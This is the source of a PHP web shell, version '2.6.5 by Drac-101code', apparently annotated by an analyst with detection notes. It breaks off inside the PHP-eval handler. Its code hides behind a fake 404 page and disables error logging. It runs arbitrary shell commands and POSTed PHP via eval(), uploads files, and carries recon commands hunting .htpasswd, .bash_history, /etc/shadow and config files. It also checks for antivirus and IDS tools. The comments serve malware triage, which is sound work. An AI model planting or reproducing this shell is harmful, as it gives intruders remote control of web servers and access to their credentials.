  1.  
  2. <?php
  // Operator configuration of this PHP web shell.
  // $auth_pass is a 32-hex-digit string that the gate further down compares with
  // md5($_POST['pass']); it is an unsalted digest, and the literal is a usable
  // signature string when hunting for copies of this file.
  3. $auth_pass = "21232f297a57a5a743894a0e4a801fc3";
  4. $color = "#00ff00";
  // $sec == 1 enables the password gate.
  5. $sec = 1;
  // NOTE(review): presumably the action run when a request names none; the dispatcher
  // is not part of this excerpt.
  6. $default_action = 'FilesMan';
  7. @define('SELF_PATH', __FILE__);
  8.  
  9.  
  // Crawler cloaking: a request whose User-Agent matches one of these names gets a bare
  // 404 status and the script stops, which keeps the file out of search-engine indexes.
  // Detection: the same URL answering 404 to crawler User-Agents and 200 to others.
  10. if(!empty($_SERVER['HTTP_USER_AGENT'])) {
  11. $userAgents = array("Google", "Slurp", "MSNBot", "ia_archiver", "Yandex", "Rambler", "facebook","yahoo");
  12. if(preg_match('/' . implode('|', $userAgents) . '/i', $_SERVER['HTTP_USER_AGENT'])) {
  13. header('HTTP/1.0 404 Not Found');
  14. exit;
  15. }
  16. }
  // Anti-forensics: error display and PHP error logging are switched off for this
  // request and the execution time limit is lifted. Activity will therefore not show up
  // in the PHP error log; web-server access logs (POSTs to this path) remain the main
  // evidence source.
  17. @session_start();
  18. @error_reporting(0);
  19. @ini_set('error_log',NULL);
  20. @ini_set('log_errors',0);
  21. @ini_set('max_execution_time',0);
  22. @set_time_limit(0);
  // NOTE(review): the magic-quotes functions used below no longer exist in current PHP
  // releases, which suggests the sample was written for legacy PHP 5 hosts — confirm
  // against the runtime of the affected server.
  23. @set_magic_quotes_runtime(0);
  // The VERSION string is printed into the page title by printHeader() and is another
  // stable string to search for.
  24. @define('VERSION' , '2.6.5 by Drac-101code');
  // With magic quotes on, recursively strip the added slashes from $_POST so operator
  // input reaches the handlers unmodified.
  25. if( get_magic_quotes_gpc() ) {
  26. function stripslashes_array($array) {
  27. return is_array($array) ? array_map('stripslashes_array', $array) : stripslashes($array);
  28. }
  29. $_POST = stripslashes_array($_POST);
  30. }
  /**
   * Emit the decoy page shown to unauthenticated visitors, then terminate the script.
   *
   * The markup imitates an Apache "Not Found" error page but also carries a POST form
   * with one password field named "pass", styled with a white background and white
   * border so it does not stand out. This function sets no status header itself.
   * HTTP_HOST is echoed into the page without escaping.
   *
   * Detection: a "Not Found" body that contains a password input named "pass".
   */
  31. function printLogin() {
  32. ?>
  33. <h1>Not Found</h1>
  34. <p>The requested URL was not found on this server.</p>
  35. <hr>
  36. <address>Apache Server at <?=$_SERVER['HTTP_HOST']?> Port 80</address>
  37. <style>
  38. input { margin:0;background-color:#fff;border:1px solid #fff; }
  39. </style>
  40. <center>
  41. <form method=post>
  42. <input type=password name=pass>
  43. </form></center>
  44. <?php
  45. exit;
  46. }
  // Password gate. With $sec == 1 and no session flag for this host, access is granted
  // when $auth_pass is empty or when md5() of the posted 'pass' field equals $auth_pass
  // (loose == comparison); otherwise printLogin() prints the decoy page and exits.
  // The session flag is stored under the key md5(HTTP_HOST).
  47. if($sec == 1 && !isset( $_SESSION[md5($_SERVER['HTTP_HOST'])]))
  48. if( empty( $auth_pass ) ||
  49. ( isset( $_POST['pass'] ) && ( md5($_POST['pass']) == $auth_pass ) ) )
  50. $_SESSION[md5($_SERVER['HTTP_HOST'])] = true;
  51. else
  52. printLogin();
  53.  
  // Environment fingerprint: OS family from PHP_OS, plus the safe_mode and
  // disable_functions ini values.
  54. if( strtolower( substr(PHP_OS,0,3) ) == "win" )
  55. $os = 'win';
  56. else
  57. $os = 'nix';
  58. $safe_mode = @ini_get('safe_mode');
  59. $disable_functions = @ini_get('disable_functions');
  60. $home_cwd = @getcwd();
  // The working directory is taken from the POSTed 'c' field, so the remote operator
  // chooses it on every request.
  61. if( isset( $_POST['c'] ) )
  62. @chdir($_POST['c']);
  63. $cwd = @getcwd();
  // Normalise Windows backslashes to '/' and make sure $cwd ends with '/'.
  64. if( $os == 'win') {
  65. $home_cwd = str_replace("\\", "/", $home_cwd);
  66. $cwd = str_replace("\\", "/", $cwd);
  67. }
  68. if( $cwd[strlen($cwd)-1] != '/' )
  69. $cwd .= '/';
  70.  
  // Canned reconnaissance commands, keyed by menu label, one set per OS family.
  // They enumerate network state and accounts, SUID/SGID and world-writable files, web
  // and service configuration files, and credential-bearing files (.htpasswd,
  // .bash_history, .mysql_history, .fetchmailrc, service.pwd, backups and dumps).
  // NOTE(review): the code that renders and runs these is outside this excerpt;
  // entries with an empty command ("Find", "Locate") look like group headings.
  // Detection: the web-server / PHP worker account spawning find, locate, netstat,
  // lsattr, dir, net, arp or ipconfig.
  71. if($os == 'win')
  72. $aliases = array(
  73. "List Directory" => "dir",
  74. "Find index.php in current dir" => "dir /s /w /b index.php",
  75. "Find *config*.php in current dir" => "dir /s /w /b *config*.php",
  76. "Show active connections" => "netstat -an",
  77. "Show running services" => "net start",
  78. "User accounts" => "net user",
  79. "Show computers" => "net view",
  80. "ARP Table" => "arp -a",
  81. "IP Configuration" => "ipconfig /all"
  82. );
  83. else
  84. $aliases = array(
  85. "List dir" => "ls -la",
  86. "list file attributes on a Linux second extended file system" => "lsattr -va",
  87. "show opened ports" => "netstat -an | grep -i listen",
  88. "Find" => "",
  89. "find all suid files" => "find / -type f -perm -04000 -ls",
  90. "find suid files in current dir" => "find . -type f -perm -04000 -ls",
  91. "find all sgid files" => "find / -type f -perm -02000 -ls",
  92. "find sgid files in current dir" => "find . -type f -perm -02000 -ls",
  93. "find config.inc.php files" => "find / -type f -name config.inc.php",
  94. "find config* files" => "find / -type f -name \"config*\"",
  95. "find config* files in current dir" => "find . -type f -name \"config*\"",
  96. "find all writable folders and files" => "find / -perm -2 -ls",
  97. "find all writable folders and files in current dir" => "find . -perm -2 -ls",
  98. "find all service.pwd files" => "find / -type f -name service.pwd",
  99. "find service.pwd files in current dir" => "find . -type f -name service.pwd",
  100. "find all .htpasswd files" => "find / -type f -name .htpasswd",
  101. "find .htpasswd files in current dir" => "find . -type f -name .htpasswd",
  102. "find all .bash_history files" => "find / -type f -name .bash_history",
  103. "find .bash_history files in current dir" => "find . -type f -name .bash_history",
  104. "find all .fetchmailrc files" => "find / -type f -name .fetchmailrc",
  105. "find .fetchmailrc files in current dir" => "find . -type f -name .fetchmailrc",
  106. "Locate" => "",
  107. "locate httpd.conf files" => "locate httpd.conf",
  108. "locate vhosts.conf files" => "locate vhosts.conf",
  109. "locate proftpd.conf files" => "locate proftpd.conf",
  110. "locate psybnc.conf files" => "locate psybnc.conf",
  111. "locate my.conf files" => "locate my.conf",
  112. "locate admin.php files" =>"locate admin.php",
  113. "locate cfg.php files" => "locate cfg.php",
  114. "locate conf.php files" => "locate conf.php",
  115. "locate config.dat files" => "locate config.dat",
  116. "locate config.php files" => "locate config.php",
  117. "locate config.inc files" => "locate config.inc",
  118. "locate config.inc.php" => "locate config.inc.php",
  119. "locate config.default.php files" => "locate config.default.php",
  120. "locate config* files " => "locate config",
  121. "locate .conf files"=>"locate '.conf'",
  122. "locate .pwd files" => "locate '.pwd'",
  123. "locate .sql files" => "locate '.sql'",
  124. "locate .htpasswd files" => "locate '.htpasswd'",
  125. "locate .bash_history files" => "locate '.bash_history'",
  126. "locate .mysql_history files" => "locate '.mysql_history'",
  127. "locate .fetchmailrc files" => "locate '.fetchmailrc'",
  128. "locate backup files" => "locate backup",
  129. "locate dump files" => "locate dump",
  130. "locate priv files" => "locate priv"
  131. );
  132.  
  /**
   * Print the panel's HTML head, its client-side helpers and the status/menu banner.
   *
   * The page holds a hidden form named "mf" with the fields a, c, p1..p4 and charset.
   * The JavaScript helpers set()/g()/da2() fill that form and submit it, so operator
   * actions reach the server as POST requests carrying those field names; a()/sr()
   * send the same fields through XMLHttpRequest with ajax=true, and
   * processReqChange() eval()s the length-prefixed JavaScript the server sends back.
   *
   * $_POST['a'], $_POST['charset'], HTTP_HOST and REQUEST_URI are written into the
   * page without escaping. The page title is "<host>- 404 Not Found" followed by the
   * VERSION constant.
   *
   * Detection: POST bodies with the a/c/p1..p4/charset field set, and response bodies
   * whose title combines "404 Not Found" with the VERSION string.
   */
  133. function printHeader() {
  134. if(empty($_POST['charset']))
  135. $_POST['charset'] = "UTF-8";
  136. global $color;
  137. ?>
  138. <html><head><meta http-equiv='Content-Type' content='text/html; charset=<?=$_POST['charset']?>'><title><?=$_SERVER['HTTP_HOST']?>- 404 Not Found<?=VERSION?></title>
  139. <style>
  140. body {background-color:#000;color:#fff;}
  141. body,td,th { font: 9pt Lucida,Verdana;margin:0;vertical-align:top; }
  142. span,h1,a { color:<?=$color?> !important; }
  143. span { font-weight: bolder; }
  144. h1 { border:1px solid <?=$color?>;padding: 2px 5px;font: 14pt Verdana;margin:0px; }
  145. div.content { padding: 5px;margin-left:5px;}
  146. a { text-decoration:none; }
  147. a:hover { background:#ff0000; }
  148. .ml1 { border:1px solid #444;padding:5px;margin:0;overflow: auto; }
  149. .bigarea { width:100%;height:250px; }
  150. input, textarea, select { margin:0;color:#00ff00;background-color:#000;border:1px solid <?=$color?>; font: 9pt Monospace,"Courier New"; }
  151. form { margin:0px; }
  152. #toolsTbl { text-align:center; }
  153. .toolsInp { width: 80%; }
  154. .main th {text-align:left;}
  155. .main tr:hover{background-color:#5e5e5e;}
  156. .main td, th{vertical-align:middle;}
  157. pre {font-family:Courier,Monospace;}
  158. #cot_tl_fixed{position:fixed;bottom:0px;font-size:12px;left:0px;padding:4px 0;clip:_top:expression(document.documentElement.scrollTop+document.documentElement.clientHeight-this.clientHeight);_left:expression(document.documentElement.scrollLeft + document.documentElement.clientWidth - offsetWidth);}
  159. </style>
  160. <script>
  161. function set(a,c,p1,p2,p3,p4,charset) {
  162. if(a != null)document.mf.a.value=a;
  163. if(c != null)document.mf.c.value=c;
  164. if(p1 != null)document.mf.p1.value=p1;
  165. if(p2 != null)document.mf.p2.value=p2;
  166. if(p3 != null)document.mf.p3.value=p3;
  167. if(p4 != null)document.mf.p4.value=p4;
  168. if(charset != null)document.mf.charset.value=charset;
  169. }
  170. function g(a,c,p1,p2,p3,charset) {
  171. set(a,c,p1,p2,p3,charset);
  172. document.mf.submit();
  173. }
  174. function da2(a,c,p1,p2,p3,p4,charset) {
  175. set(a,c,p1,p2,p3,p4,charset);
  176. document.mf.submit();
  177. }
  178. function a(a,c,p1,p2,p3,charset) {
  179. set(a,c,p1,p2,p3,charset);
  180. var params = "ajax=true";
  181. for(i=0;i<document.mf.elements.length;i++)
  182. params += "&"+document.mf.elements[i].name+"="+encodeURIComponent(document.mf.elements[i].value);
  183. sr('<?=$_SERVER['REQUEST_URI'];?>', params);
  184. }
  185. function sr(url, params) {
  186. if (window.XMLHttpRequest) {
  187. req = new XMLHttpRequest();
  188. req.onreadystatechange = processReqChange;
  189. req.open("POST", url, true);
  190. req.setRequestHeader ("Content-Type", "application/x-www-form-urlencoded");
  191. req.send(params);
  192. }
  193. else if (window.ActiveXObject) {
  194. req = new ActiveXObject("Microsoft.XMLHTTP");
  195. if (req) {
  196. req.onreadystatechange = processReqChange;
  197. req.open("POST", url, true);
  198. req.setRequestHeader ("Content-Type", "application/x-www-form-urlencoded");
  199. req.send(params);
  200. }
  201. }
  202. }
  203. function processReqChange() {
  204. if( (req.readyState == 4) )
  205. if(req.status == 200) {
  206.  
  207. //alert(req.responseText);
  208. var reg = new RegExp("(\\d+)([\\S\\s]*)", "m");
  209. var arr=reg.exec(req.responseText);
  210. eval(arr[2].substr(0, arr[1]));
  211. }
  212. else alert("Request error!");
  213. }
  214. </script>
  215. <head><body><div style="position:absolute;width:100%;top:0;left:0;">
  216. <form method=post name=mf style='display:none;'>
  217. <input type=hidden name=a value='<?=isset($_POST['a'])?$_POST['a']:''?>'>
  218. <input type=hidden name=c value='<?=htmlspecialchars($GLOBALS['cwd'])?>'>
  219. <input type=hidden name=p1 value='<?=isset($_POST['p1'])?htmlspecialchars($_POST['p1']):''?>'>
  220. <input type=hidden name=p2 value='<?=isset($_POST['p2'])?htmlspecialchars($_POST['p2']):''?>'>
  221. <input type=hidden name=p3 value='<?=isset($_POST['p3'])?htmlspecialchars($_POST['p3']):''?>'>
  222. <input type=hidden name=p4 value='<?=isset($_POST['p4'])?htmlspecialchars($_POST['p4']):''?>'>
  223. <input type=hidden name=charset value='<?=isset($_POST['charset'])?$_POST['charset']:''?>'>
  224. </form>
  225. <?php
  // Host facts for the banner: disk usage of the current directory and the kernel
  // name and release reported by php_uname().
  226. $freeSpace = @diskfreespace($GLOBALS['cwd']);
  227. $totalSpace = @disk_total_space($GLOBALS['cwd']);
  228. $totalSpace = $totalSpace?$totalSpace:1;
  229. $release = @php_uname('r');
  230. $kernel = @php_uname('s');
  // Search links on public exploit-database sites; the first one gets the host's
  // kernel name/release appended as the query, i.e. the banner is built to look up
  // known issues for the running kernel version.
  231. $millink='http://www.exploit-db.com/search/?action=search&filter_description=';
  232. // fixme
  233. $millink2='http://www.1337day.com/search';
  234.  
  235. if( strpos('Linux', $kernel) !== false )
  236. $millink .= urlencode( '' . substr($release,0,6) );
  237. else
  238. $millink .= urlencode( $kernel . ' ' . substr($release,0,3) );
  // Identity of the PHP process: effective user and group through posix_* when that
  // extension is present, otherwise the script owner's ids with group shown as "?".
  239. if(!function_exists('posix_getegid')) {
  240. $user = @get_current_user();
  241. $uid = @getmyuid();
  242. $gid = @getmygid();
  243. $group = "?";
  244. } else {
  245. $uid = @posix_getpwuid(@posix_geteuid());
  246. $gid = @posix_getgrgid(@posix_getegid());
  247. $user = $uid['name'];
  248. $uid = $uid['uid'];
  249. $group = $gid['name'];
  250. $gid = $gid['gid'];
  251. }
  252.  
  // Breadcrumb: one clickable link per path component of the current directory.
  253. $cwd_links = '';
  254. $path = explode("/", $GLOBALS['cwd']);
  255. $n=count($path);
  256. for($i=0;$i<$n-1;$i++) {
  257. $cwd_links .= "<a href='#' onclick='g(\"FilesMan\",\"";
  258. for($j=0;$j<=$i;$j++)
  259. $cwd_links .= $path[$j].'/';
  260. $cwd_links .= "\")'>".$path[$i]."/</a>";
  261. }
  262. $charsets = array('UTF-8', 'Windows-1251', 'KOI8-R', 'KOI8-U', 'cp866');
  263. $opt_charsets = '';
  264. foreach($charsets as $item)
  265. $opt_charsets .= '<option value="'.$item.'" '.($_POST['charset']==$item?'selected':'').'>'.$item.'</option>';
  // Menu label => action name. For triage this list is the panel's capability
  // inventory (file manager, console, SQL, PHP eval, brute force, network, infect,
  // symlink, deface, self-removal, ...); most of the handlers are outside this excerpt.
  266. $m = array('Sec. Info'=>'SecInfo','Files'=>'FilesMan','Console'=>'Console','Sql'=>'Sql','Php'=>'Php','Safe mode'=>'SafeMode','String tools'=>'StringTools','Bruteforce'=>'Bruteforce','Network'=>'Network','Infect'=>'Infect','Readable'=>'Readable','Test'=>'Test','CgiShell'=>'CgiShell','Symlink'=>'Symlink','Deface'=>'Deface', 'Domain'=>'Domain','ZHposter'=>'ZHposter');
  267.  
  268. if(!empty($GLOBALS['auth_pass']))
  269. $m['Logout'] = 'Logout';
  270. $m['Self remove'] = 'SelfRemove';
  271. $menu = '';
  272. foreach($m as $k => $v)
  273. $menu .= '<th width="'.(int)(1/count($m)).'%">[ <a href="#" onclick="g(\''.$v.'\',null,\'\',\'\',\'\')">'.$k.'</a> ]</th>';
  // On Windows, list every drive letter a..z that exists as a directory.
  274. $drives = "";
  275. if ($GLOBALS['os'] == 'win') {
  276. foreach( range('a','z') as $drive )
  277. if (is_dir($drive.':\\'))
  278. $drives .= '<a href="#" onclick="g(\'FilesMan\',\''.$drive.':/\')">[ '.$drive.' ]</a> ';
  279. }
  // Banner output: uname, user/group, PHP version, safe-mode state, disk usage, cwd,
  // server and client IP, then the menu row. rootxpL() is not defined in this excerpt.
  280. echo '<table class=info cellpadding=3 cellspacing=0 width=100%><tr><td width=1><span>Uname<br>User<br>Php<br>Hdd<br>Cwd'.($GLOBALS['os'] == 'win'?'<br>Drives':'').'</span></td>'.
  281. '<td>:<nobr>'.substr(@php_uname(), 0, 120).' <a href="http://www.google.com/search?q='.urlencode(@php_uname()).'" target="_blank">[Google]</a> <a href="'.$millink.'" target=_blank>[exploit-db]</a> <a href="'.$millink2.'" target=_blank>[1337day]</a>
  282. Download : <a href="http://www.google.com" target=_blank>[SideKick1]</a>
  283. <a href="http://www.google.com" target=_blank>[SideKick2]</a>
  284. </nobr><br>:'.$uid.' ( '.$user.' ) <span>Group:</span> '.$gid.' ( '.$group.' ) <span>Usefull Locals:</span> '.rootxpL().' <br>:'.@phpversion().' <span>Safe mode:</span> '.($GLOBALS['safe_mode']?'<font color=red>ON</font>':'<font color=<?=$color?><b>OFF</b></font>').' <a href=# onclick="g(\'Php\',null,null,\'info\')">[ phpinfo ]</a> <span>Datetime:</span> '.date('Y-m-d H:i:s').'<br>:'.viewSize($totalSpace).' <span>Free:</span> '.viewSize($freeSpace).' ('.(int)($freeSpace/$totalSpace*100).'%)<br>:'.$cwd_links.' '.viewPermsColor($GLOBALS['cwd']).' <a href=# onclick="g(\'FilesMan\',\''.$GLOBALS['home_cwd'].'\',\'\',\'\',\'\')">[ home ]</a><br>'.$drives.'</td>'.
  285. '<td width=1 align=right><nobr><select onchange="g(null,null,null,null,null,this.value)"><optgroup label="Page charset">'.$opt_charsets.'</optgroup></select><br><span>Server IP:</span><br>'.gethostbyname($_SERVER["HTTP_HOST"]).'<br><span>Client IP:</span><br>'.$_SERVER['REMOTE_ADDR'].'</nobr></td></tr></table>'.
  286. '<table cellpadding=3 cellspacing=0 width=100%><tr>'.$menu.'</tr></table><div style="margin:5">';
  287. }
  288.  
  /**
   * Print the toolbar shown under every page and close the HTML document.
   *
   * The toolbar is a table of small forms: change directory, read file, make
   * directory, make file, execute a command (sent to the "Console" action) and upload
   * a file. All but the upload form submit through the JavaScript helper g(); the
   * upload form posts multipart data directly with a='FilesMAn' (spelled as shown)
   * and p1='uploadFile'. $is_writable is a coloured label saying whether the current
   * directory is writable by the PHP process.
   *
   * Detection: multipart POSTs to this path that carry p1=uploadFile and a file part
   * named "f".
   */
  289. function printFooter() {
  290. $is_writable = is_writable($GLOBALS['cwd'])?"<font color=green>[ Writeable ]</font>":"<font color=red>[ Not writable ]</font>";
  291. ?>
  292. </div>
  293. <table class=info id=toolsTbl cellpadding=0 cellspacing=0 width=100%">
  294. <tr>
  295. <td><form onSubmit="g(null,this.c.value);return false;"><span>Change dir:</span><br><input class="toolsInp" type=text name=c value="<?=htmlspecialchars($GLOBALS['cwd']);?>"><input type=submit value=">>"></form></td>
  296. <td><form onSubmit="g('FilesTools',null,this.f.value);return false;"><span>Read file:</span><br><input class="toolsInp" type=text name=f><input type=submit value=">>"></form></td>
  297. </tr>
  298. <tr>
  299. <td><form onSubmit="g('FilesMan',null,'mkdir',this.d.value);return false;"><span>Make dir:</span><br><input class="toolsInp" type=text name=d><input type=submit value=">>"></form><?=$is_writable?></td>
  300. <td><form onSubmit="g('FilesTools',null,this.f.value,'mkfile');return false;"><span>Make file:</span><br><input class="toolsInp" type=text name=f><input type=submit value=">>"></form><?=$is_writable?></td>
  301. </tr>
  302. <tr>
  303. <td><form onSubmit="g('Console',null,this.c.value);return false;"><span>Execute:</span><br><input class="toolsInp" type=text name=c value=""><input type=submit value=">>"></form></td>
  304. <td><form method='post' ENCTYPE='multipart/form-data'>
  305. <input type=hidden name=a value='FilesMAn'>
  306. <input type=hidden name=c value='<?=htmlspecialchars($GLOBALS['cwd'])?>'>
  307. <input type=hidden name=p1 value='uploadFile'>
  308. <input type=hidden name=charset value='<?=isset($_POST['charset'])?$_POST['charset']:''?>'>
  309. <span>Upload file:</span><br><input class="toolsInp" type=file name=f><input type=submit value=">>"></form><?=$is_writable?></td>
  310. </tr>
  311.  
  312. </table>
  313. </div>
  314. </body></html>
  315. <?php
  316. }
  // Fallback stubs: when posix_getpwuid / posix_getgrgid are missing and not named in
  // disable_functions, define versions that return false so that later calls to them
  // do not abort the script.
  317. if ( !function_exists("posix_getpwuid") && (strpos($GLOBALS['disable_functions'], 'posix_getpwuid')===false) ) { function posix_getpwuid($p) { return false; } }
  318. if ( !function_exists("posix_getgrgid") && (strpos($GLOBALS['disable_functions'], 'posix_getgrgid')===false) ) { function posix_getgrgid($p) { return false; } }
  /**
   * Run a shell command line and return whatever it printed.
   *
   * Tries exec, passthru, system, shell_exec and finally popen, using the first one
   * that function_exists() reports; returns '' if none produced output. The command
   * string is passed through unchanged.
   *
   * Hardening note: because of the fallback chain, a disable_functions setting only
   * stops this routine when it lists all five of these functions.
   * Detection: shell child processes started by the web-server / PHP worker account.
   *
   * @param string $in command line to execute
   * @return string captured output
   */
  319. function ex($in) {
  320. $out = '';
  321. if(function_exists('exec')) {
  322. @exec($in,$out);
  323. $out = @join("\n",$out);
  324. }elseif(function_exists('passthru')) {
  325. ob_start();
  326. @passthru($in);
  327. $out = ob_get_clean();
  328. }elseif(function_exists('system')) {
  329. ob_start();
  330. @system($in);
  331. $out = ob_get_clean();
  332. }elseif(function_exists('shell_exec')) {
  333. $out = shell_exec($in);
  334. }elseif(is_resource($f = @popen($in,"r"))) {
  335. $out = "";
  336. while(!@feof($f))
  337. $out .= fread($f,1024);
  338. pclose($f);
  339. }
  340. return $out;
  341. }
  /**
   * Format a byte count for display.
   *
   * Values of at least 1024^3, 1024^2 or 1024 bytes are shown with two decimals as
   * GB, MB or KB respectively; anything smaller is shown as "<n> B".
   *
   * @param int|float $s size in bytes
   * @return string
   */
  342. function viewSize($s) {
  343. if($s >= 1073741824)
  344. return sprintf('%1.2f', $s / 1073741824 ). ' GB';
  345. elseif($s >= 1048576)
  346. return sprintf('%1.2f', $s / 1048576 ) . ' MB';
  347. elseif($s >= 1024)
  348. return sprintf('%1.2f', $s / 1024 ) . ' KB';
  349. else
  350. return $s . ' B';
  351. }
  352.  
  /**
   * Render a numeric file mode as a ten-character "ls -l" style string.
   *
   * The first character comes from the file-type bits (s, l, -, b, d, c, p, or u when
   * none match); the remaining nine are the owner, group and other rwx triplets, with
   * s/S, s/S and t/T marking the 0x0800, 0x0400 and 0x0200 bits in the execute slots.
   *
   * @param int $p mode value as returned by fileperms()
   * @return string
   */
  353. function perms($p) {
  354. if (($p & 0xC000) == 0xC000)$i = 's';
  355. elseif (($p & 0xA000) == 0xA000)$i = 'l';
  356. elseif (($p & 0x8000) == 0x8000)$i = '-';
  357. elseif (($p & 0x6000) == 0x6000)$i = 'b';
  358. elseif (($p & 0x4000) == 0x4000)$i = 'd';
  359. elseif (($p & 0x2000) == 0x2000)$i = 'c';
  360. elseif (($p & 0x1000) == 0x1000)$i = 'p';
  361. else $i = 'u';
  362. $i .= (($p & 0x0100) ? 'r' : '-');
  363. $i .= (($p & 0x0080) ? 'w' : '-');
  364. $i .= (($p & 0x0040) ? (($p & 0x0800) ? 's' : 'x' ) : (($p & 0x0800) ? 'S' : '-'));
  365. $i .= (($p & 0x0020) ? 'r' : '-');
  366. $i .= (($p & 0x0010) ? 'w' : '-');
  367. $i .= (($p & 0x0008) ? (($p & 0x0400) ? 's' : 'x' ) : (($p & 0x0400) ? 'S' : '-'));
  368. $i .= (($p & 0x0004) ? 'r' : '-');
  369. $i .= (($p & 0x0002) ? 'w' : '-');
  370. $i .= (($p & 0x0001) ? (($p & 0x0200) ? 't' : 'x' ) : (($p & 0x0200) ? 'T' : '-'));
  371. return $i;
  372. }
  /**
   * Return the perms() string for a path wrapped in a coloured bold font tag.
   *
   * Red when the PHP process cannot read the path, white when it can read but not
   * write it, green when it can write it — so the listing highlights what the web
   * account is able to modify.
   *
   * @param string $f path to inspect
   * @return string HTML fragment
   */
  373. function viewPermsColor($f) {
  374. if (!@is_readable($f))
  375. return '<font color=#FF0000><b>'.perms(@fileperms($f)).'</b></font>';
  376. elseif (!@is_writable($f))
  377. return '<font color=white><b>'.perms(@fileperms($f)).'</b></font>';
  378. else
  379. return '<font color=#00BB00><b>'.perms(@fileperms($f)).'</b></font>';
  380. }
  // Replacement for scandir() on runtimes that lack it: opens the directory and
  // collects every name readdir() yields into an array, which it returns. The handle
  // is not closed here and the result is not sorted.
  381. if(!function_exists("scandir")) {
  382. function scandir($dir) {
  383. $dh = opendir($dir);
  384. while (false !== ($filename = readdir($dh))) {
  385. $files[] = $filename;
  386. }
  387. return $files;
  388. }
  389. }
  /**
   * Look up a program with the shell's `which` by way of ex().
   *
   * The name is appended to the command string as given. Each call runs one shell
   * command, so the probing loops in actionSecInfo() show up as a series of `which`
   * processes under the web-server account.
   *
   * @param string $p program name
   * @return string|false output of `which`, or false when it is empty
   */
  390. function which($p) {
  391. $path = ex('which '.$p);
  392. if(!empty($path))
  393. return $path;
  394. return false;
  395. }
  /**
   * "Sec. Info" page: print a security inventory of the host for the operator.
   *
   * Reports server software, loaded Apache modules, disabled PHP functions,
   * open_basedir, the safe-mode directories, cURL support and available database
   * client functions. On non-Windows hosts it also reports whether /etc/passwd and
   * /etc/shadow are readable, prints /proc/version and /etc/issue.net and, when
   * safe_mode is off, probes with which() for build tools, security tools and
   * download tools and prints /etc/hosts, `df -h` and /etc/fstab. On Windows it runs
   * ver, net accounts and net user. Values are echoed without HTML escaping.
   *
   * Detection: a burst of `which <name>` lookups for compiler, downloader and
   * security-tool names issued by the web-server account, together with reads of the
   * files listed above.
   */
  396. function actionSecInfo() {
  397. printHeader();
  398. echo '<h1>Server security information</h1><div class=content>';
  // Prints one "label: value" row; multi-line values go into a <pre> block and empty
  // values are skipped.
  399. function showSecParam($n, $v) {
  400. $v = trim($v);
  401. if($v) {
  402. echo '<span>'.$n.': </span>';
  403. if(strpos($v, "\n") === false)
  404. echo $v.'<br>';
  405. else
  406. echo '<pre class=ml1>'.$v.'</pre>';
  407. }
  408. }
  409.  
  410. showSecParam('Server software', @getenv('SERVER_SOFTWARE'));
  411. if(function_exists('apache_get_modules'))
  412. showSecParam('Loaded Apache modules', implode(', ', apache_get_modules()));
  413. showSecParam('Disabled PHP Functions', ($GLOBALS['disable_functions'])?$GLOBALS['disable_functions']:'none');
  414. showSecParam('Open base dir', @ini_get('open_basedir'));
  415. showSecParam('Safe mode exec dir', @ini_get('safe_mode_exec_dir'));
  416. showSecParam('Safe mode include dir', @ini_get('safe_mode_include_dir'));
  417. showSecParam('cURL support', function_exists('curl_version')?'enabled':'no');
  418. $temp=array();
  419. if(function_exists('mysql_get_client_info'))
  420. $temp[] = "MySql (".mysql_get_client_info().")";
  421. if(function_exists('mssql_connect'))
  422. $temp[] = "MSSQL";
  423. if(function_exists('pg_connect'))
  424. $temp[] = "PostgreSQL";
  425. if(function_exists('oci_connect'))
  426. $temp[] = "Oracle";
  427. showSecParam('Supported databases', implode(', ', $temp));
  428. echo '<br>';
  429.  
  430. if( $GLOBALS['os'] == 'nix' ) {
  // Three probe lists: build/scripting tools, defensive software (the names include
  // antivirus, rootkit-checker, firewall, IDS and log-monitoring tools) and download
  // tools. The page reports which of them which() can find on the host.
  431. $userful = array('gcc','lcc','cc','ld','make','php','perl','python','ruby','tar','gzip','bzip','bzip2','nc','locate','suidperl');
  432. $danger = array('kav','nod32','bdcored','uvscan','sav','drwebd','clamd','rkhunter','chkrootkit','iptables','ipfw','tripwire','shieldcc','portsentry','snort','ossec','lidsadm','tcplodg','sxid','logcheck','logwatch','sysmask','zmbscap','sawmill','wormscan','ninja');
  433. $downloaders = array('wget','fetch','lynx','links','curl','get','lwp-mirror');
  434. showSecParam('Readable /etc/passwd', @is_readable('/etc/passwd')?"yes <a href='#' onclick='g(\"FilesTools\", \"/etc/\", \"passwd\")'>[view]</a>":'no');
  435. showSecParam('Readable /etc/shadow', @is_readable('/etc/shadow')?"yes <a href='#' onclick='g(\"FilesTools\", \"etc\", \"shadow\")'>[view]</a>":'no');
  436. showSecParam('OS version', @file_get_contents('/proc/version'));
  437. showSecParam('Distr name', @file_get_contents('/etc/issue.net'));
  // The which()-based probes and the df call need command execution, so they are
  // only attempted when safe_mode is off.
  438. if(!$GLOBALS['safe_mode']) {
  439. echo '<br>';
  440. $temp=array();
  441. foreach ($userful as $item)
  442. if(which($item)){$temp[]=$item;}
  443. showSecParam('Userful', implode(', ',$temp));
  444. $temp=array();
  445. foreach ($danger as $item)
  446. if(which($item)){$temp[]=$item;}
  447. showSecParam('Danger', implode(', ',$temp));
  448. $temp=array();
  449. foreach ($downloaders as $item)
  450. if(which($item)){$temp[]=$item;}
  451. showSecParam('Downloaders', implode(', ',$temp));
  452. echo '<br/>';
  453. showSecParam('Hosts', @file_get_contents('/etc/hosts'));
  454. showSecParam('HDD space', ex('df -h'));
  455. showSecParam('Mount options', @file_get_contents('/etc/fstab'));
  456. }
  457. } else {
  458. showSecParam('OS Version',ex('ver'));
  459. showSecParam('Account Settings',ex('net accounts'));
  460. showSecParam('User Accounts',ex('net user'));
  461. }
  462. echo '</div>';
  463. printFooter();
  464. }
  465.  
  /**
   * "Php" page: execute operator-supplied PHP and optionally show phpinfo().
   *
   * $_POST['p1'] is handed to eval() unchanged, which gives the requester arbitrary
   * code execution with the privileges of the PHP process. When the 'ajax' field is
   * present the captured output is returned as a length-prefixed JavaScript snippet
   * and the script exits; otherwise the output is HTML-escaped into the PhpOutput
   * element of the page. With p2 == 'info' the phpinfo() output is embedded after
   * several of its stylesheet rules are rewritten or removed.
   *
   * Detection: POST bodies with PHP source text in the p1 field, and responses that
   * consist of a decimal length line followed by a document.getElementById('PhpOutput')
   * assignment.
   */
  466. function actionPhp() {
  // AJAX variant: remember the preference in the session, run the code, reply with
  // "<length>\n<javascript>" for the page's processReqChange() handler.
  467. if( isset($_POST['ajax']) ) {
  468. $_SESSION[md5($_SERVER['HTTP_HOST']).'ajax'] = true;
  469. ob_start();
  470. eval($_POST['p1']);
